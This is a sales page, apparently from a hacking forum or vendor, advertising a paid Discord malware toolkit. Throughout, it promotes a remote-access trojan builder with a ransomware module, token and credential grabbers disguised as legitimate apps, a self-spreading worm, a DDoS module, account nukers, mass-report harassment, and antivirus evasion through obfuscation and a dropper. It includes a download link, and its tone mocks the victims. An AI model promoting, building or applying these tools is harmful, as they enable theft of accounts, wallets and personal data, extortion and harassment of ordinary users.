Proof of concept on Discords API weaknesses
The Toolkit started as a singular stub-builder all the way back in Q1 2021. We quickly realized that this could become a massive project that we could work on for months on end, and we were right. Week after week we started working on new ideas for at least 4 to 5 months until we spotted our first copy-cat. Back then, this was fully open-source on Github. But because of said copy-cats & because of the fact that our tool now was way more powerful than anything else for Discord that was open-source, we decided to change that.
We went closed-source with this project and kept adding new features and bug fixes all the time. Some features are too powerful to be given out to everyone, so we quickly added a licensing system, but now have a look at what we actually have in store for you:
Now public in two available Versions
Lets compare some features:
Free for all
Malicious
A simple rat creator with only a few basic commands. For the full rat suite including ~70 commands and more you need Premium
Here’s a list of all Free commands:
[Currently disabled and being rewritten to also bypass the new captchas without a 2Captcha Key]
A powerful Raid-Tool with proxy option. Load your tokens, proxies and raid on for hours. Spam a server or single people. Its your choice
Note: Yes, this decrypts the new Tokens saved with the 2022 Token encryption
Create a Token Grabber with obfuscation, small file-size and Icon to be spoofed as any application you want. Tricking a user was never simpler. Tokens will be sent via Webhook
Grabbed the Token of your worst enemy? Dont stop there, ruin it completely. The token nuker deletes all friends, leaves all servers and closes all messages before ultimately messing the settings up and even trying to lock it.
Huh.. why is that webhook being rate-limited? Probably because someone used our Webhook spammer.
Proof of Concept
[IMPORTANT: JUST PROOF OF CONCEPT]
A nitro-gen trying random combinations to get you valid Nitro.
[IMPORTANT: JUST PROOF OF CONCEPT]
Same as Nitro-gen. Just with discord server invites. can be fun.
Self Options
Simple tool to login with a User-token. Just input the token and you’re in. We handle the other stuff
The Selfbot I have posted on my Forum, now also in my Toolkit. Spam users, send fun gifs, auto-farm dankmemer and more
Quick and easy way to see everything with just a token. Username, avatar link, nitro status, billing information etc.
Other Options
Hate someone but cant get their token? Fine, just mass report them. Get a message link, some throwaway tokens and spam report that guy. 100% ban garuantee
Yeah, a large Toolkit also comes with a few small settings.
Toggle your RPC (Rich presence Client for discord to display the Toolkit as your current game)
Toggle Music bc… I dont even know why
Re-install & Update the Toolkithttps://cloud.cynthiaai.de/s/RJ45H4ReYRTCEwS/preview
Full Access (35$ Lifetime)
Malicious
Create your own RAT, controlled through Discord. Obfuscated with our custom-made “zalgo” obfuscation and with auto start-up, VM detection, and a Watchdog to guarantee it stays active. Nearly 70 commands ranging from simple directory listing over up/download all the way to a ransomware module.
Check out all commands here:
Got a ton of clients? Want to use their computing power to give someone “connection problems”? No problem. Just use this CNC module for that
Note: Yes, this decrypts the new Tokens saved with the 2022 Token encryption
Get the maximum amount of Info from your Grabber. Geolocation, Discord Password, details from all browsers, crypto-wallets, backup keys, game-client sessions, and more! Using our own injection method that modifies the Discord client in multiple ways, you will always get every update.
The Token Grabber+ will of course be obfuscated and encrypted before you send it to the User to ensure it doesn’t alert any AV
Also, while the Standard token grabber only grabs from 4 Locations, this one grabs from pretty much every possible browser and even defeats a few common “Token Protectors”.
A new version of grabbing someone’s Token. Create a QR-Code that looks like a new option to accept a Nitro gift. If they scan it, you get access to their account.
Found a big fish? A bot developer?
That’s what I made the Nuker+ for. Not only does this nuke the User account and lock it with a 100% guarantee, no it also nukes every single bot linked to that Account. It first tries to get all intents on the dev page (only fails if it’s a verified bot) and then nukes every guild the bot is in (ban all members, delete everything), and just because why not then also invalidates its own token.
Have fun
Build your very own Discord Worm. When a user runs it, it will execute your pre-defined payload and spread itself over Discord by automatically messaging all their friends a Download link for that exact worm. Stonks
Proof of Concept
[IMPORTANT: JUST PROOF OF CONCEPT]
This is a unique Idea. Brute-forcing someone’s Token. A discord Token is made of 3 parts, their account id, the creation date and a cryptographic value that’s not known. Having 2/3 of the token makes it easy to bruteforce it with enough time
Self Options
Getting nuked often? No worries. With our Account backup tool you can make a carbon-copy of your Account in mere seconds and roll it out to a new account in even less time whenever needed. Username, avatar, friends, servers, block-list… everything is getting backed up
Want to save a certain chat or just all 300 channels you have access to? Fine, go ahead. Nice HTML format with media files included.
Other Options
Need some proxies? Use our Tool.
Note: these arent a valid replacement for private paid proxies. These are just less-used proxies that are good enough for discord raids etc.
Who would’ve guessed. VT, Antiscan & co. dont like the original stubs. Ugh, fine.
We now ship our Toolkit with the option to use obfuscation & Encryption to ensure your payload stays FUD. Works even better with the Dropper
Of course sending a massive 20+mb payload for your RAT or Token Grabber isn’t the easiest thing to do so we worked on a Dropper. Its ~5mb and with that can even be sent by spam-bots. Its also compatible with most binders to bind it to legitimate applications or whatever else your dark heart desires